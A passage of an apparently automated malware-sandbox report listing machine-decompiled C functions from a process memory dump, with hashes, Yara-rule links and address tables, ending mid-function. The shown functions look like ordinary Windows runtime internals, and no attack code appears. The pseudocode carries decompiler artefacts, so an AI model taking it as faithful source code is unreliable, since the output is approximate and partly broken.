                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d448edbfc49d1530d82bff3d89a40d8fe95a738ad546fc0c0a9f9ea42feceaa
                                                                                                                                • Instruction ID: dda9e29301b1afc13ee1519e6e9bc56c123c812ef3d15a0fff87519f23e1ff9f
                                                                                                                                • Opcode Fuzzy Hash: 9d448edbfc49d1530d82bff3d89a40d8fe95a738ad546fc0c0a9f9ea42feceaa
                                                                                                                                • Instruction Fuzzy Hash: 73116633B011109FDB28EE558D81A2B7397EBC5774F294229DE26DB3A0D932BC13D690
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F74257, Relevance: .1, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 90%
                                                                                                                                			E04F74257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4fc08d0);
				E04F3D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04F741E8(__ebx, __edi, __ecx, _t39);
				E04EFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4fd87e4;
					_t18 =  *0x4fd87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4fd5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4fd87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4fd87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04EE7055(_t31 + 0xfffffff8);
								_t24 =  *0x4fd87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4fd87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4fd5cd0;
				if( *0x4fd5cd0 <= 0) {
					L04EE7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4fd87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4fd87e8 = _t30;
						 *0x4fd87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04F3D0D1(L04F74320());
			}















                                                                                                                                0x04f74257
                                                                                                                                0x04f74257
                                                                                                                                0x04f74257
                                                                                                                                0x04f74259
                                                                                                                                0x04f7425e
                                                                                                                                0x04f74263
                                                                                                                                0x04f74265
                                                                                                                                0x04f74273
                                                                                                                                0x04f74278
                                                                                                                                0x04f7427c
                                                                                                                                0x04f7427f
                                                                                                                                0x04f74281
                                                                                                                                0x04f74287
                                                                                                                                0x04f742d7
                                                                                                                                0x04f742d7
                                                                                                                                0x04f742da
                                                                                                                                0x04f7428d
                                                                                                                                0x04f7428d
                                                                                                                                0x04f7428f
                                                                                                                                0x04f74292
                                                                                                                                0x04f74297
                                                                                                                                0x04f7429c
                                                                                                                                0x04f742a0
                                                                                                                                0x04f742a6
                                                                                                                                0x04f742a8
                                                                                                                                0x04f742ae
                                                                                                                                0x04f742b3
                                                                                                                                0x00000000
                                                                                                                                0x04f742ba
                                                                                                                                0x04f742ba
                                                                                                                                0x04f742bf
                                                                                                                                0x04f742c5
                                                                                                                                0x04f742ca
                                                                                                                                0x04f742cf
                                                                                                                                0x04f742d0
                                                                                                                                0x00000000
                                                                                                                                0x04f742d0
                                                                                                                                0x04f742b3
                                                                                                                                0x00000000
                                                                                                                                0x04f742a6
                                                                                                                                0x04f7429c
                                                                                                                                0x04f742dc
                                                                                                                                0x04f742dc
                                                                                                                                0x04f742e3
                                                                                                                                0x04f74309
                                                                                                                                0x04f742e5
                                                                                                                                0x04f742e5
                                                                                                                                0x04f742e8
                                                                                                                                0x04f742ee
                                                                                                                                0x04f742f0
                                                                                                                                0x00000000
                                                                                                                                0x04f742f2
                                                                                                                                0x04f742f2
                                                                                                                                0x04f742f4
                                                                                                                                0x04f742f7
                                                                                                                                0x04f742f9
                                                                                                                                0x04f74300
                                                                                                                                0x04f74300
                                                                                                                                0x04f742f0
                                                                                                                                0x04f7430e
                                                                                                                                0x04f7431f

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a9998f70e573043d6987a83378bdbc31c684bac6b7c377e0629494080780a031
                                                                                                                                • Instruction ID: 46905418fda2f14c5544f7ae5fd0c22cffa50e60120da496259d114597b0fded
                                                                                                                                • Opcode Fuzzy Hash: a9998f70e573043d6987a83378bdbc31c684bac6b7c377e0629494080780a031
                                                                                                                                • Instruction Fuzzy Hash: 8B214D70A02606DFD716EF65E500A5477F2FB45359B14826FC2298B2A4DB3EE852CF50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F646A7, Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E04F646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04F2F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04F1D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04F077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                                0x04f646b7
                                                                                                                                0x04f646ba
                                                                                                                                0x04f646c5
                                                                                                                                0x04f646c8
                                                                                                                                0x04f646d0
                                                                                                                                0x04f646d4
                                                                                                                                0x04f646e6
                                                                                                                                0x04f646e9
                                                                                                                                0x04f646f4
                                                                                                                                0x04f646ff
                                                                                                                                0x04f64705
                                                                                                                                0x04f64706
                                                                                                                                0x04f6470c
                                                                                                                                0x04f64713
                                                                                                                                0x04f6471b
                                                                                                                                0x04f64723
                                                                                                                                0x04f64725
                                                                                                                                0x04f646d6
                                                                                                                                0x04f646d9
                                                                                                                                0x04f646db
                                                                                                                                0x04f646db
                                                                                                                                0x04f64732

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                • Instruction ID: 9da98c56da8d4f6b329d932aa593e294bd3a672d932c8152c3a381f1c82d28bd
                                                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                • Instruction Fuzzy Hash: C411E572A04208BBD705AF5CD9808BEF7B9EF95304F1080AAF945C7351DA31AD56D7A4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F12397, Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 34%
                                                                                                                                			E04F12397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4fd848c != 0) {
					L04F0FAD0(0x4fd8610);
					if( *0x4fd848c == 0) {
						E04F0FA00(0x4fd8610, _t19, _t27, 0x4fd8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04F12581(0x4fd8610, 0x4ec50a0, _t26, _t27, _t28);
						E04F0FA00(0x4fd8610, 0x4ec50a0, _t27, 0x4fd8610);
					}
				} else {
					L1:
					_t11 =  *0x4fd8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04F24886(0x4ec1088, 1, 0x4fd8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04F12581(0x4fd8610, (_t11 << 4) + 0x4ec5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                                                0x04f123b0
                                                                                                                                0x04f123b6
                                                                                                                                0x04f12409
                                                                                                                                0x04f12415
                                                                                                                                0x04f55ae9
                                                                                                                                0x00000000
                                                                                                                                0x04f1241b
                                                                                                                                0x04f1241b
                                                                                                                                0x04f1241d
                                                                                                                                0x04f12427
                                                                                                                                0x04f1242e
                                                                                                                                0x04f12430
                                                                                                                                0x04f12430
                                                                                                                                0x04f123b8
                                                                                                                                0x04f123b8
                                                                                                                                0x04f123b8
                                                                                                                                0x04f123bf
                                                                                                                                0x04f123fc
                                                                                                                                0x04f123fc
                                                                                                                                0x04f123c1
                                                                                                                                0x04f123c3
                                                                                                                                0x04f123d0
                                                                                                                                0x04f123d8
                                                                                                                                0x04f123d8
                                                                                                                                0x04f123dc
                                                                                                                                0x04f123de
                                                                                                                                0x04f123e1
                                                                                                                                0x04f123e1
                                                                                                                                0x04f123ec

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c573e9e6a495c8a6e92a0784c359c0c6b4ec2f522e6438c342b94878e81e2f1b
                                                                                                                                • Instruction ID: 4938de81a4df97257028f5fc492c7be3f30a8e6ab45dcc52e131ecdd0cc1058a
                                                                                                                                • Opcode Fuzzy Hash: c573e9e6a495c8a6e92a0784c359c0c6b4ec2f522e6438c342b94878e81e2f1b
                                                                                                                                • Instruction Fuzzy Hash: 1F112B3270031067F330AA7AAD81F16B699EB90764F15845AF602F71A1D5B4FC039755
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEC962, Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 42%
                                                                                                                                			E04EEC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4fdd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04EFEEF0(0x4fd70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04F6F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04EFEB70(_t29, 0x4fd70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04F2B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04F6F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4fd70c0; // 0x0
					while(_t38 != 0x4fd70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4fdb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                                0x04eec96a
                                                                                                                                0x04eec974
                                                                                                                                0x04eec988
                                                                                                                                0x04eec98a
                                                                                                                                0x04f57c9d
                                                                                                                                0x04f57c9f
                                                                                                                                0x04f57ca4
                                                                                                                                0x04f57cae
                                                                                                                                0x04f57cf0
                                                                                                                                0x04f57cf5
                                                                                                                                0x04f57cfa
                                                                                                                                0x04eec992
                                                                                                                                0x04eec996
                                                                                                                                0x04eec997
                                                                                                                                0x04eec998
                                                                                                                                0x04eec9a3
                                                                                                                                0x04eec9a3
                                                                                                                                0x04f57cb0
                                                                                                                                0x04f57cb7
                                                                                                                                0x04f57cbb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57cbd
                                                                                                                                0x04f57ce8
                                                                                                                                0x04f57cc5
                                                                                                                                0x04f57cc8
                                                                                                                                0x04f57cca
                                                                                                                                0x04f57cd0
                                                                                                                                0x04f57cd6
                                                                                                                                0x04f57cde
                                                                                                                                0x04f57ce4
                                                                                                                                0x04f57ce4
                                                                                                                                0x04f57cd0
                                                                                                                                0x00000000
                                                                                                                                0x04f57ce8
                                                                                                                                0x04eec990
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa815fe1ca5392d66d9473654803fae07292d60b7bfc68af100e1b7e3f0c6aba
                                                                                                                                • Instruction ID: 28690c86abdab1f678cd97a8151b2955a798f89b3ec0d8f22d563b6fe6ed0759
                                                                                                                                • Opcode Fuzzy Hash: aa815fe1ca5392d66d9473654803fae07292d60b7bfc68af100e1b7e3f0c6aba
                                                                                                                                • Instruction Fuzzy Hash: 5111C2327006469BD710BF68DC4992A77F6FB88614F400528EE41976A0DB20FC12CBD1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F237F5, Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 87%
                                                                                                                                			E04F237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04F02280(_t6, 0x4fd8550);
				}
				_t29 = E04F2387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04EFFFB0(0x4fd8550, _t27, 0x4fd8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                                                0x04f237fa
                                                                                                                                0x04f237fc
                                                                                                                                0x04f23805
                                                                                                                                0x04f23808
                                                                                                                                0x04f23808
                                                                                                                                0x04f23814
                                                                                                                                0x04f23818
                                                                                                                                0x04f23846
                                                                                                                                0x04f23848
                                                                                                                                0x04f2384b
                                                                                                                                0x04f2384b
                                                                                                                                0x04f23852
                                                                                                                                0x00000000
                                                                                                                                0x04f23854
                                                                                                                                0x04f23856
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f23863
                                                                                                                                0x00000000
                                                                                                                                0x04f23863
                                                                                                                                0x04f2381a
                                                                                                                                0x04f2381a
                                                                                                                                0x04f2381f
                                                                                                                                0x04f2386e
                                                                                                                                0x04f2386e
                                                                                                                                0x04f23871
                                                                                                                                0x04f23873
                                                                                                                                0x04f23873
                                                                                                                                0x04f23868
                                                                                                                                0x00000000
                                                                                                                                0x04f23868
                                                                                                                                0x04f23821
                                                                                                                                0x04f23826
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f23828
                                                                                                                                0x04f2382a
                                                                                                                                0x04f23841
                                                                                                                                0x00000000
                                                                                                                                0x04f23841

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: db2e5dd9b07be54c1e2bba1000978b73442027b4f91b6b4a09abd8eb1876905e
                                                                                                                                • Instruction ID: 3a8d963cc20b1f346d040b1dcc69c8acf2eb370c7fc9cad5b2d4f581bfa9d5ed
                                                                                                                                • Opcode Fuzzy Hash: db2e5dd9b07be54c1e2bba1000978b73442027b4f91b6b4a09abd8eb1876905e
                                                                                                                                • Instruction Fuzzy Hash: EE01C4F3E416309BD3279B299A40A66BBA6DF85B607164069ED458F215D738F802CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1002D, Relevance: .1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F1002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04F07D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04F07D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04F07D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04F07D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                                                0x04f10032
                                                                                                                                0x04f10037
                                                                                                                                0x04f10043
                                                                                                                                0x04f54b3a
                                                                                                                                0x04f10049
                                                                                                                                0x04f10049
                                                                                                                                0x04f10049
                                                                                                                                0x04f1004e
                                                                                                                                0x04f10053
                                                                                                                                0x04f54b48
                                                                                                                                0x04f54b5a
                                                                                                                                0x04f54b4a
                                                                                                                                0x04f54b53
                                                                                                                                0x04f54b53
                                                                                                                                0x04f54b5f
                                                                                                                                0x00000000
                                                                                                                                0x04f54b61
                                                                                                                                0x00000000
                                                                                                                                0x04f54b61
                                                                                                                                0x04f10059
                                                                                                                                0x04f10059
                                                                                                                                0x04f10060
                                                                                                                                0x04f54b6f
                                                                                                                                0x04f54b6f
                                                                                                                                0x04f10069
                                                                                                                                0x04f54b83
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54b90
                                                                                                                                0x04f54b9b
                                                                                                                                0x04f54b9b
                                                                                                                                0x04f54ba4
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54baa
                                                                                                                                0x00000000
                                                                                                                                0x04f1006f
                                                                                                                                0x04f1006f
                                                                                                                                0x00000000
                                                                                                                                0x04f1006f
                                                                                                                                0x04f10069

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                • Instruction ID: 2fa4757aa69e09f724780a773a72104f01924c91779f0b91fb9385919e35c5d6
                                                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                • Instruction Fuzzy Hash: 9D11D672B066819FE7229B28CD44B3577D5EF41758F0900E1EE1487AB2EB28F8C3D664
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF766D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 94%
                                                                                                                                			E04EF766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04F1F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04F1F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04F04620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                                                0x04ef7672
                                                                                                                                0x04ef767f
                                                                                                                                0x04ef7689
                                                                                                                                0x04ef76de
                                                                                                                                0x04ef76de
                                                                                                                                0x04ef768b
                                                                                                                                0x04ef7691
                                                                                                                                0x04ef7693
                                                                                                                                0x04ef7697
                                                                                                                                0x00000000
                                                                                                                                0x04ef7699
                                                                                                                                0x04ef76a8
                                                                                                                                0x00000000
                                                                                                                                0x04ef76aa
                                                                                                                                0x04ef76ad
                                                                                                                                0x04ef76b1
                                                                                                                                0x00000000
                                                                                                                                0x04ef76b3
                                                                                                                                0x04ef76b3
                                                                                                                                0x04ef76b5
                                                                                                                                0x04ef76ba
                                                                                                                                0x04ef76bc
                                                                                                                                0x04ef76bc
                                                                                                                                0x04ef76c0
                                                                                                                                0x00000000
                                                                                                                                0x04ef76c2
                                                                                                                                0x04ef76ce
                                                                                                                                0x04ef76ce
                                                                                                                                0x04ef76c0
                                                                                                                                0x04ef76b1
                                                                                                                                0x04ef76a8
                                                                                                                                0x04ef7697
                                                                                                                                0x04ef76d9

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                • Instruction ID: 4f5b584100f88427f3c93495ceaf22415652ea1b9e3186a3bd290854e5204797
                                                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                • Instruction Fuzzy Hash: F301A732700119AFD720EE5ECD41E5BB7ADEB84760F250924BA08CB290DA30FD02C7B0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE9080, Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 69%
                                                                                                                                			E04EE9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4fd85ec;
				E04F02280(_t48, 0x4fd85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04EFFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4fd538c; // 0x301b680
					if( *_t84 != 0x4fd5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4fbf6e8);
						E04F3D0E8(0x4fd85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04FB88F5(_t80, _t85, 0x4fd5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4fd86c0; // 0x30007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4fd86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04F02280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04FB88F5(0x4fd85ec, _t85, 0x4fd5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
